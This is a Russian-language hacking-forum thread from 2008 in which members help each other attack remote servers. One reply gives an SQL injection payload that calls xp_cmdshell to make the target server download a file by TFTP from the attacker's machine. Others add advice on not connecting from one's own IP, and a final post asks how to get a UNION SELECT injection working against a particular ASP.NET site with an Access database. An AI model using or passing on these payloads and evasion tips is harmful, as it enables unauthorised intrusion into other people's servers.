Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

21.11.2008, 17:20
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме: 63941
Репутация:
2
|
|
Пробну через Ettercap пожалуй.
|
|
|

21.11.2008, 18:11
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме: 63941
Репутация:
2
|
|
Не вышло чет, мб я что-либо сделал неправильно. Жду советов. Желательно по конкретнее что да как )
|
|
|

21.11.2008, 18:28
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме: 3244717
Репутация:
1980
|
|
Скачивай tftp сервер (http://tftpd32.jounin.net/tftpd32_download.html), запускай на своем компе, указав папку, из которой будут закачиваться файлы на удаленный сервер. Теперь выполняй команду через инъекцию:
;exec master..xp_cmdshell 'tftp -i [твой ip] GET [любой файл из папки] [путь нового файла]'--
например
;exec master..xp_cmdshell 'tftp -i 12.34.56.78 GET blabla.txt C:\blabla.txt'--
Во время закачивания файл на удаленный сервер, можно видеть список активных подключений. Во вкладке Log viewer также можно увидеть адреса всех клиентов.
|
|
|

21.11.2008, 18:30
|
|
Banned
Регистрация: 29.05.2008
Сообщений: 116
Провел на форуме: 447871
Репутация:
208
|
|
палевно все-таки к своему айпи конектица...
|
|
|

21.11.2008, 18:51
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме: 63941
Репутация:
2
|
|
Да вот в том то и дело, что кроме пинга я ничего не могу делать (видать файр, ито не стандартный).
|
|
|

21.11.2008, 18:57
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме: 599789
Репутация:
227
|
|
так можно не к своему =)
|
|
|

21.11.2008, 20:05
|
|
Постоянный
Регистрация: 04.11.2007
Сообщений: 303
Провел на форуме: 811764
Репутация:
119
|
|
SHS, чем win(tcp)dump не нравится?  Запускаешь и ловишь пакеты 
|
|
|

21.11.2008, 21:15
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме: 63941
Репутация:
2
|
|
Просто я никогда их не использовал. Мой любимый сниф- Ettercap. Другие познавать это время, а времени нет.
|
|
|

21.11.2008, 21:25
|
|
Постоянный
Регистрация: 04.11.2007
Сообщений: 303
Провел на форуме: 811764
Репутация:
119
|
|
Там не нужно ничего познавать. Единственный аргумент, который тебе придется использовать это "-i", для указания интерфейса(если он не один).
Пример:
Все 
|
|
|

21.11.2008, 22:34
|
|
Новичок
Регистрация: 21.11.2008
Сообщений: 5
Провел на форуме: 24866
Репутация:
0
|
|
Привет!
Надеюсь пишу в нужную тему. Ситуация: есть самописный движок на ASP .NET, база Access. Пытаюсь сделать SQL inj вида:
_http://url/page.aspx?page=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21+from+tablename%00
При этом получается ошибка: Exception Details: System.InvalidCastException: Specified cast is not valid. Т.е. как я понимаю где-то в запросе данные преобразуются и проверяются... Можно ли как-то просто вычислить это место?
Табличка и тип базы точно известны, т.к. удалось успешно использовать почти такую же inj в другом проекте на этом движке :-) Но там использовалась уязвимость в части, которой на нужном сайте просто нет. Число параметров подобрано по order by
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|